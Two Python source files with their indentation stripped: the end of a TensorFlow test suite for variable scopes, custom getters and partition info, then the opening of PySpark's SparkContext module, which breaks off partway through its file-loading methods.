self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = variable_scope.VariableSynchronization.AUTO
aggregation = variable_scope.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
variable_scope.get_variable("v", [1])
self.assertEqual(1, called[0])
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
synchronization = variable_scope.VariableSynchronization.ON_READ
aggregation = variable_scope.VariableAggregation.MEAN
variable_scope.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'custom_getter/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("custom_getter/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'sum_getter_2/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("sum_getter_2/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
# take products of sums of products
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertAllEqual(variable_names, ["forced_name"])
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
variable_scope.VariableAggregation.MEAN)
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creater_c):
variable_scope.get_variable(
"v", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertTrue(called[0])
class PartitionInfoTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
if __name__ == "__main__":
test.main()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
jrdd = self._serialize_to_jvm(c, numSlices, serializer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, parallelism, serializer):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a file and loaded through textFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
return readRDDFromFile(self._jsc, tempFile.name, parallelism)
finally:
# readRDDFromFile eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
